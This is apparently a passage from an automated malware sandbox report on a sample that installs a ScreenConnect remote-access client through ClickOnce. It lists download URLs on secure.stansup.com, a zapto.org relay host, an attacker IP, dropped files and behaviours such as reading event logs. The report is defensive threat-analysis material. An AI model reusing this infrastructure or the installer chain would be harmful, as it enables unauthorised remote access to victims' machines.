                  Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfDT
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staP
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staPJ
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staPJh
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staPb
                  Source: dfsvc.exe, 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.c
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1735285114.0000000000599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/Scre
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.C
                  Source: dfsvc.exe, 00000002.00000002.2236254474.0000027688762000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client
                  Source: 96r3GgxntQ.exe, 00000000.00000002.1554370443.000000000082A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicatI5
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.0000000002421000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.appl
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp, 5W9VLRZG.log.2.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicat
                  Source: dfsvc.exe, 00000002.00000002.2257743246.00000276A5F10000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2257953370.00000276A5F3D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1746319827.000000001AD01000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1735935388.0000000000679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application%
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application.MO3
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application.MO3RT
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application1
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application16
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1735285114.0000000000620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application9
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application9e0892
                  Source: 5W9VLRZG.log.2.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or
                  Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationG
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationGU
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationMO3
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationMO33UA
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationO3
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationX
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1735285114.0000000000620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationn
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationt
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationtv
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dll
                  Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dllI
                  Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dlla
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp, 5W9VLRZG.log.2.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifest001O3
                  Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifestM
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A1DA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllkU9
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe(T
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Core.dllY
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windop
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2256114237.00000276A41AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000002.00000002.2256114237.00000276A41AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dllx
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2236254474.0000027688762000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2255186285.00000276A4151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000002.00000002.2256114237.00000276A41A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe=
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exex
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsCl
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configL
                  Source: dfsvc.exe, 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configj
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe8
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileMa
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exX
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config~&
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exeNU
                  Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exeyU
                  Source: svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49817 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49834 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49891 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  barindex
                  Detected potential unwanted application
                  Source: 96r3GgxntQ.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BBA4950_2_00BBA495
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFE7DD51B3810_2_00007FFE7DD51B38
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFE7DD8112813_2_00007FFE7DD81128
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFE7E09691513_2_00007FFE7E096915
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608
                  Source: 96r3GgxntQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal66.evad.winEXE@18/77@2/2
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00BB1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7608
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCommand line argument: dfshim0_2_00BB1000
                  Source: 96r3GgxntQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 96r3GgxntQ.exeReversingLabs: Detection: 23%
                  Source: unknownProcess created: C:\Users\user\Desktop\96r3GgxntQ.exe "C:\Users\user\Desktop\96r3GgxntQ.exe"
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
